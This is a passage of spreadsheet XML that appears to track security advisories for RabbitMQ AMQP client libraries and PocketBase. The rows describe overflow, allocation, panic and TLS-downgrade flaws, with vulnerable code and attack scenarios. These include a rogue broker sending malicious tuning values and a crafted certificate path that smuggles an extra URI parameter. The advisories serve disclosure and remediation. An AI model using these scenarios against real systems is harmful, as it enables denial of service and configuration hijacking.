        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M3" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr"/>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-316, CWE-326</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>## Summary
A structural security weakness exists in the AMQP client's TLS configuration generator (`tlsConfigFromURI`). When constructing a `*tls.Config` object from an `amqps://` connection URI, the library initializes the structure without explicitly defining the `MinVersion` field. 
While modern versions of the Go compiler toolchain (Go 1.18+) default the implicit minimum version to TLS 1.2, this security posture relies entirely on an implicit toolchain dependency. If the library is compiled using legacy Go toolchains (Go &lt; 1.18), or if a future toolchain introduces fallback behavior, the client could silently negotiate obsolete and insecure TLS 1.0 or TLS 1.1 protocols during connection handshakes with a compromised or malicious AMQP broker.
---
## Vulnerability Details
### Mechanism
The vulnerability lies in the lack of an explicit safety floor when assigning configurations inside the URI component:
```go
// Example within uri.go's tlsConfigFromURI
cfg := &amp;tls.Config{
    ServerName: host,
    // MinVersion is left completely unassigned (defaults to 0, or toolchain default)
}
```
In the Go standard library (`crypto/tls`), leaving `MinVersion: 0` instructs the runtime to choose the toolchain's default minimum. Prior to Go 1.18, this default allowed negotiation down to TLS 1.0. Relying on implicit compiler configurations violates secure coding practices by decoupling the library's security posture from its source code, leaving applications vulnerable based solely on how they are built.
### Impact
If a client application is built with a legacy compiler environment or a custom Go runtime, an attacker capable of executing a Man-in-the-Middle (MitM) attack can force the connection to downgrade to TLS 1.0 or 1.1. This exposes the AMQP protocol data stream to well-known cryptographic vulnerabilities (such as BEAST, POODLE, or SWEET32), allowing the attacker to decrypt or alter message payloads, connection parameters, and authentication credentials.
---
## Attack Vector
An attacker performing a network-level downgrade attack can intercept a client connection built under a legacy toolchain:
1. **Interception:** A client application compiled on a legacy pipeline attempts to establish an encrypted connection to an AMQP broker.
2. **Protocol Downgrade:** The attacker intercepts the TLS Client Hello handshake and forces a downgrade negotiation to TLS 1.0.
3. **Cryptographic Exploitation:** Because `MinVersion` was never explicitly locked to `tls.VersionTLS12` by the library, the client accepts the weak cipher suites, allowing the attacker to monitor or manipulate the underlying AMQP session data.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77405</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77408</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M4" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr"/>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>## Summary
A data integrity and protocol corruption vulnerability exists in the AMQP client's property serialization logic. When encoding AMQP short string (`shortstr`) fields—such as identifiers, routing strings, and content metadata—the length of the string is explicitly cast to a fixed-size 8-bit unsigned integer (`uint8`). 
If an application provides a property string exceeding 255 bytes, the length counter silently wraps around (e.g., a length of 300 wraps to 44). As a result, the parser writes only a truncated portion of the string into the outgoing connection buffer without returning an error. This leads to silent data corruption, broken RPC routing, and unpredictable broker-side state behavior.
---
## Vulnerability Details
### Mechanism
The vulnerability resides in the wire-level serialization logic for application publishing properties:
```go
// write.go:246
length := uint8(len(b))  // wraps silently when len(b) &gt; 255 (e.g., 300 -&gt; 44)
```
Because Go allows silent integer truncation during explicit type casting, lengths larger than $2^8 - 1$ lose their most significant bits. The underlying stream writer reads `length` to determine how many bytes to pull from the buffer. Because no error or boundary check accompanies this truncation, the application believes the full payload was transmitted successfully.
### Affected Properties
This truncation behavior affects every standard AMQP field serialized as a `shortstr`:
* `CorrelationId`
* `ReplyTo`
* `MessageId`
* `Expiration`
* `UserId`
* `AppId`
* `ContentType`
* `ContentEncoding`
* `Type`
### Impact
The critical consequence is **silent protocol desynchronization at the application layer**. The underlying TCP stream remains framed properly (because the shortened length matches the bytes written), but the business logic is corrupted. Distributed transactions, request-reply correlations, and tracing headers are truncated, causing downstream systems to drop messages or route them to incorrect consumers.
---
## Attack Vector
An attacker who can influence metadata fields processed by an upstream application (such as a user-supplied tracking ID or a long content-type header) can exploit this to break system components:
1. **Targeting RPC Routing:** A user passes a malicious or overly long `CorrelationId` of 300 bytes through an application endpoint.
2. **Silent Truncation:** The library wraps the length value to 44, transmitting only the first 44 bytes to the rabbitMQ broker.
3. **Broken Correlation:** When the service processes the request and responds, the replying consumer attempts to route the message using the full 300-byte identifier. Because the broker only recognizes the truncated 44-byte ID, the reply loop breaks silently, leading to hanging processes or data leaks across transaction boundaries.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77408</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77403</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr"/>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>## Summary
A Denial of Service (DoS) vulnerability exists in the AMQP client's connection negotiation logic. The AMQP specification explicitly mandates a strict minimum frame size of 4096 bytes to prevent pathological packet fragmentation. While the library defines a `frameMinSize = 4096` constant, the connection negotiation loop fails to enforce this boundary, blindly accepting whatever maximum frame size (`FrameMax`) the server advertises during the handshake.
If a client connects to a malicious or compromised AMQP broker that advertises an extremely low `FrameMax` (such as 1 byte), the negotiation succeeds. Consequently, every subsequent message transmission is forced to splinter into thousands or millions of single-byte frames, causing massive CPU overhead, thread contention, and a near-instantaneous application freeze.
---
## Vulnerability Details
### Mechanism
During the connection establishment phase, the client and server negotiate connection parameters—including maximum channel count, heartbeat intervals, and maximum frame sizes. The vulnerability is located where the client accepts the server's tuning parameters:
```go
// Connection negotiation logic maps server values directly without validation
if serverSettings.FrameMax &gt; 0 {
    // VULNERABILITY: Lacks a floor validation check against frameMinSize (4096)
    c.config.FrameMax = serverSettings.FrameMax 
}
```
Because there is no conditional check asserting that `serverSettings.FrameMax &gt;= frameMinSize`, a value below the protocol specification floor is successfully registered. When the application later passes data payloads to the frame writer, the chunking algorithm splits the payload using the negotiated `FrameMax` value as its chunk window divisor.
### Impact
When `FrameMax` is set to an absurdly low threshold (e.g., 1 to 10 bytes):
* A standard 10 KiB message payload requires tens of thousands of individual write operations and frame headers.
* The system's CPU becomes entirely bound by frame serialization, memory allocation for frame structures, and context switching within the network output loops.
* This results in an application-layer Denial of Service (DoS) affecting not just the specific AMQP connection, but potentially the entire host system due to CPU resource starvation.
---
## Attack Vector
An attacker who compromises an upstream AMQP broker, performs a Man-in-the-Middle (MitM) interception, or tricks an application into connecting to an unauthorized external rogue broker can trigger this vulnerability:
1. **Rogue Handshake:** The client application connects to an AMQP endpoint controlled by the attacker.
2. **Malicious Parameter Tuning:** During the `connection.tune` phase, the rogue server returns a `FrameMax` value of `1`.
3. **Resource Exhaustion Trigger:** The client completes the handshake successfully. As soon as the client attempts to publish a message or process traffic, the internal loop fragments the data into single-byte frames, spiking the host's CPU usage to 100% and disabling the application thread.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77403</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77410</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M6" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>**Summary**
A flaw in the `recvContent` function allows a malicious AMQP server to trigger an Out-of-Memory (OOM) error, forcing the host operating system or container runtime to immediately terminate the client process.
**Vulnerability Details**
When receiving message content payloads, the client processes the expected size from the content header framework. The `recvContent` function attempts to optimize performance by pre-allocating memory for the message body based on the `ch.header.Size` field, which is a 64-bit unsigned integer (`uint64`).
```go
// channel.go:495-496
if cap(ch.body) == 0 {
    ch.body = make([]byte, 0, ch.header.Size)  // unbounded
}
```
The underlying library fails to validate or cap this requested size against any upper boundary—such as the maximum frame size negotiated during connection establishment (`FrameMax`). If a server specifies an extreme body size (e.g., `2^62` bytes), the Go runtime attempts to allocate an exabyte-scale slice capacity. This immediately exhausts available system memory, causing the operating system's OOM killer to terminate the application.
**Attack Vector / Exploitation Scenario**
- Message Delivery Phase: A malicious or compromised AMQP broker sends a standard `basic.deliver` frame containing a content header with an intentionally inflated `body-size` variable.
- Authentication Requirement: No special privileges or authentication bypasses are required; the crash occurs seamlessly during normal message consumption.
**Impact**
- Availability: High. Exploded memory consumption results in an instant process termination, destroying application state and availability for all threads sharing the environment.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77410</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77412</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M7" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr"/>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>**Summary**
A vulnerability in the readField function allows a malicious or compromised AMQP server to trigger an unhandled runtime panic in the client application, leading to an immediate crash of the entire process.
**Details**
When parsing incoming AMQP frames, the `readField` function processes byte-array fields (type tag `'x'`) by reading a 32-bit big-endian integer to determine the length of the data payload.
```go
// read.go:253-263
case 'x':
    var len int32
    if err = binary.Read(r, binary.BigEndian, &amp;len); err != nil {
        return nil, err
    }
    value := make([]byte, len)  // PANICS if len &lt; 0
```
If a server transmits a length value of `0xFFFFFFFF`, it is interpreted by the client as a signed 32-bit integer with a value of `-1`. Passing a negative integer to Go's built-in make() function for slice allocation triggers an unrecoverable runtime panic (panic: len out of range).
Because the reader goroutine handles network I/O without an explicit recover() wrapper, this panic propagates up to the runtime root, abruptly terminating the host application.
**Attack Vector / Exploitation Scenario**
An attacker capable of spoofing, compromising, or controlling an AMQP broker can exploit this flaw during two primary phases:
1. Connection Establishment: Sending a malicious connection.start handshake frame containing server-properties with an 'x' type field assigned a negative length.
2. Message Delivery: Delivering a message payload where the header table contains a malformed field matching the criteria above.
**Impact**
Availability: High. A single malformed frame can reliably crash the client process, resulting in a persistent Denial of Service (DoS) if the client automatically reconnects and receives the same payload.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77412</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75516</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>maven:com.rabbitmq:amqp-client</t>
        </is>
      </c>
      <c r="M8" s="5" t="inlineStr">
        <is>
          <t>5.34.0</t>
        </is>
      </c>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr"/>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>## Vulnerability
In `AMQConnection.java` (line 435-436), after `Connection.Tune` negotiation, the frame-max limit is set via:
```java
_frameHandler.setFrameMax(
    Math.min(this.maxInboundMessageBodySize, frameMax));
```
When `frameMax = 0` (meaning "unlimited" per AMQP spec), `Math.min(67108864, 0) = 0`. This value is then passed to `Utils.framePayloadLimit(0)` which returns `Integer.MAX_VALUE` (line 77-79 of Utils.java):
```java
static int framePayloadLimit(int frameMax) {
    if (frameMax &lt;= 0) {
      return Integer.MAX_VALUE;
    }
    // ...
}
```
This completely defeats the `maxInboundMessageBodySize` protection (default 64MB) at the frame level.
## Attack Scenario
A malicious AMQP server (or MITM) sends `Connection.Tune` with `frameMax=0`:
1. Client defaults: `requestedFrameMax = 0` (`ConnectionFactory.DEFAULT_FRAME_MAX`, line 82)
2. `negotiatedMaxValue(0, 0)` = `Math.max(0, 0)` = 0 (line 673-676)
3. `Math.min(maxInboundMessageBodySize, 0)` = 0 — **64MB cap defeated**
4. `framePayloadLimit(0)` = `Integer.MAX_VALUE` — no frame size enforcement
5. Attacker sends a single frame with `frameSize = 0x1FFFFFFF` (~500MB)
6. `Frame.readFrom()` (line 135) executes `new byte[frameSize]` — **OOM crash**
The frame does not need to be a body frame — method frames, header frames, or heartbeat frames with a crafted size field all trigger the allocation before any content-level check fires.
## Root Cause
The AMQP spec uses `frameMax=0` to mean "unlimited", but `Math.min` treats it as the integer value zero. The intent of line 435-436 was to take the smaller of the two limits, but when one limit uses 0-means-unlimited semantics, `Math.min` always selects the zero, disabling the other limit.
## Impact
- **Default configuration is vulnerable**: Both `requestedFrameMax` (client) and legitimate servers' `frameMax` in Tune may be 0
- **Single-frame OOM**: One malicious frame triggers up to ~2GB allocation (`Integer.MAX_VALUE` bytes)
- **Bypasses existing protection**: `maxInboundMessageBodySize` (introduced to cap allocations at 64MB) is entirely defeated at the frame level
- **Different from ValueReader OOM**: This is a frame-layer allocation in `Frame.readFrom()`, not a value-layer allocation in `ValueReader.readBytes()`
## Affected Code
- `AMQConnection.java:435-436` — `Math.min` with 0-means-unlimited
- `Utils.java:77-79` — `framePayloadLimit(0)` returns `Integer.MAX_VALUE`
- `Frame.java:135` — `new byte[frameSize]` allocation site
- `ConnectionFactory.java:82` — `DEFAULT_FRAME_MAX = 0`
## Suggested Fix
```java
int effectiveFrameMax = (frameMax == 0)
    ? this.maxInboundMessageBodySize
    : Math.min(this.maxInboundMessageBodySize, frameMax);
_frameHandler.setFrameMax(effectiveFrameMax);
```
This treats `frameMax=0` as "use maxInboundMessageBodySize as the cap" instead of "zero".</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75516</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77404</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M9" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>## Summary
A query parameter injection vulnerability exists in the AMQP client's connection URI formatting logic. When generating or parsing connection URIs, TLS-related filesystem paths (such as certificates or keys) are appended directly to the URI's query string using string concatenation rather than secure URL encoding via functions like `url.QueryEscape`.
If an application handles a TLS file path containing special character delimiters (such as `&amp;` or `=`), these characters are interpreted as parameter separators by the URI parser. If the resulting `URI.String()` output is subsequently re-parsed via `ParseURI`, the injected fields can silently overwrite or hijack critical configuration parameters, forcing the client to use arbitrary connection settings or alternate TLS files.
---
## Vulnerability Details
### Mechanism
The vulnerability lies within the lack of proper escaping when compiling connection string components into a raw URL format:
```go
// Example of insecure string concatenation during URI building
uri := fmt.Sprintf("amqps://user:pass@host/%s?certfile=%s&amp;keyfile=%s", vhost, certPath, keyPath)
```
Because `certPath` and `keyPath` are not passed through `url.QueryEscape`, special URL characters preserve their control meanings. For instance, if a user supply a certificate path named:
`/tmp/cert=foo&amp;keyfile=/evil/path`
The generated string translates into:
`...?certfile=/tmp/cert=foo&amp;keyfile=/evil/path&amp;keyfile=/original/path`
When this string passes back through `ParseURI` (common in connection re-dial routines or configuration replication steps), standard URL parsing mechanics treat the string as multiple distinct parameters. Depending on map assignment order inside the parser, the injected keys take precedence over the original parameters.
### Impact
By manipulating the file paths used for TLS assets, an attacker or compromised local sub-system can:
* Inject arbitrary alternative options or override protocol settings.
* Substitute or switch keyfiles, leading to connection failures or the parsing of unauthorized cryptographic assets.
* Corrupt connection state variables, triggering application-layer failures during connection setup or recovery.
---
## Attack Vector
An attacker who has partial control over directory naming conventions or environmental variables used to specify local infrastructure paths can execute a parameter injection attack:
1. **Path Creation:** An attacker sets up a path containing deliberate URL parameter delimiters (e.g., `/var/lib/certs/client.crt?cacertfile=/tmp/fake_ca.crt&amp;`).
2. **String Generation:** The application serializes the active connection state or passes the paths down to an unescaped URI builder function.
3. **Configuration Hijack:** The URI string is generated with the injected parameter embedded into the query structure. When the client attempts to reuse or re-parse this connection string during a connection retry or worker spin-up, it parses the injected `cacertfile` parameter, loading a different, unverified Certificate Authority string.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77404</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82410</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>go:github.com/pocketbase/pocketbase</t>
        </is>
      </c>
      <c r="M10" s="5" t="inlineStr">
        <is>
          <t>0.22.48, 0.39.7</t>
        </is>
      </c>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>PocketBase already has builtin panic-recover middleware for the regular requests handling but it doesn't cover panics in internal child/worker goroutines which in some situations could cause termination of the server process.
To prevent this from hapenning all existing internal worker functions were wrapped with the new helper `routine.SafeWrap(f)` _(auto recovers and returns any eventual panic as regular error)_.
The vulnerability was reported by @gigioneggiando and it is strongly recommended to upgrade to PocketBase **[v0.39.7](https://github.com/pocketbase/pocketbase/releases/tag/v0.39.7)** _(the fix was also backported in [v0.22.48](https://github.com/pocketbase/pocketbase/releases/tag/v0.22.48) in case you are using older PocketBase &lt; v0.23.0)_.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82410</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77406</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M11" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr"/>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>## Summary
A logic and resource exhaustion vulnerability exists in the AMQP client's Quality of Service (`Qos`) configuration method. The `Qos` function accepts signed integers (`int`) for the `prefetchCount` and `prefetchSize` parameters but casts them directly to unsigned integers (`uint16` and `uint32`, respectively) when formatting the wire-level frame.
If a developer passes a negative integer (such as `-1`) to these parameters—frequently intended as a sentinel value meaning "no change" or "no limit"—the application performs an implicit signed-to-unsigned conversion. This wraps the values to their absolute maximum limit ($65535$ and $4294967295$). Consequently, a consumer expecting restricted message delivery rates is suddenly flooded with an unlimited volume of messages, potentially exhausting memory resources and crashing the application.
---
## Vulnerability Details
### Mechanism
The bug manifests during the structural assignment inside the channel's `Qos` method:
```go
// channel.go:795-796
PrefetchCount: uint16(prefetchCount),  // -1 wraps to 65535
PrefetchSize:  uint32(prefetchSize),   // -1 wraps to 4294967295
```
In Go, converting a negative signed integer to an unsigned integer shifts the value via two's complement arithmetic. Because no boundary validation or signedness check occurs prior to the cast:
* Passing `-1` for `prefetchCount` yields a wire value of `65535`.
* Passing `-1` for `prefetchSize` yields a wire value of `4294967295`.
### Impact
The AMQP broker interprets a `prefetch-count` of `65535` as an instruction to dispatch messages to the consumer with virtually no concurrency limits. 
If the application is processing heavy payloads or relies on strict rate-limiting to maintain stability, this unexpected flood will cause rapid heap memory growth, unmanageable processing queues, and an eventual Out-Of-Memory (OOM) termination.
---
## Attack Vector
An attacker who can manipulate configuration files, environmental variables, or API inputs that dictate client Qos settings can trigger an application-layer Denial of Service:
1. **Malicious Input:** An attacker sets a service's prefetch configuration parameter to `-1`.
2. **Implicit Overflow:** The application initializes the channel, executes `Qos(-1, ...)`, and transmits an unintended maximum-capacity request to the RabbitMQ/AMQP broker.
3. **Consumer Exhaustion:** The broker flushes the entire contents of the queue directly into the client consumer's network buffer, bypassing expected application concurrency barriers and inducing a crash.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77406</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59965</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
